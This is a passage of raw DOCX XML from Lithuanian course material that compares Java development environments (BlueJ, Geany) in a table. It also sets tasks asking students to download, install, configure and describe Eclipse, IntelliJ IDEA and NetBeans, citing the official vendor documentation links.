      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>BlueJ (4.2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571"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5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458" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E0EC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>not fully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1164" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1369" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E0EC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>not fully</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2019" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Geany (1.34.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1571"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564" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDEADA"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1458" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6E0EC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>not fully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1164" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1369" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2DCDC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00616C06" w:rsidRPr="00AD4464" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>no</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="284" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE ECLIPSE INTEGRUOTĄ KŪRIMO APLINKĄ</w:t>
      </w:r>
      <w:r w:rsidR="00382E69">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parsiųsti Eclipse IDE galite iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Eclipse (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse IDE 2019-03 R Packages</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId168" w:history="1">
        <w:r w:rsidRPr="00382E69">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.eclipse.org/downloads/packages.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00382E69">
        <w:rPr>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Eclipse diegimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Eclipse (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse/Installation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId169" w:history="1">
        <w:r w:rsidRPr="00FD3A50">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://wiki.eclipse.org/Eclipse/Installation.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FD3A50">
        <w:rPr>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Eclipse konfigūravimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Eclipse (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId170" w:history="1">
        <w:r w:rsidRPr="00FD3A50">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://help.eclipse.org/2019-03/index.jsp.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FD3A50">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PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE INTELLIJ</w:t>
      </w:r>
      <w:r w:rsidR="008C5DD5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDEA INTEGRUOTĄ KŪRIMO APLINKĄ</w:t>
      </w:r>
      <w:r w:rsidR="00FD3A50">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parsiųsti Intellij Idea IDE galite iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Download IntelliJ IDEA</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r w:rsidRPr="003030C3">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/idea/download.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003030C3">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Intellij Idea diegimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Install IntelliJ IDEA</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidRPr="00BA25B2">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/installation-guide.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA25B2">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Intellij Idea konfigūravimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Configuring Project and IDE Settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidRPr="00BA25B2">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>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PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE APACHE NETBEANS INTEGRUOTĄ KŪRIMO APLINKĄ</w:t>
      </w:r>
      <w:r w:rsidR="00BB37D6">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parsiųsti NetBeans IDE galite iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Apache NetBeans Releases</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.apache.org/download/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D6">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NetBeans diegimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NetBeans IDE 8.2 Installation Instructions</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.org/community/releases/82/install.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D6">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NetBeans konfigūravimo instrukcijas rasite čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NetBeans Developing Applications with NetBeans IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/netbeans/nb82/netbeans/NBDAG/working_nbeans.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D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6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE PAGRINDINES ECLIPSE IDE APLINKOS FUNKCIJAS (FEATURES)</w:t>
      </w:r>
      <w:r w:rsidR="0022548B">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašant pagrindines Eclipse IDE aplinkos funkcijas (Features) naudokite:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Eclipse (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Platform and Equinox</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.eclipse.org/eclipse/news/4.11/platform.php.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D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7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE PAGRINDINES INTELLIJ IDEA IDE APLINKOS FUNKCIJAS (FEATURES)</w:t>
      </w:r>
      <w:r w:rsidR="00552D50">
        <w:rPr>
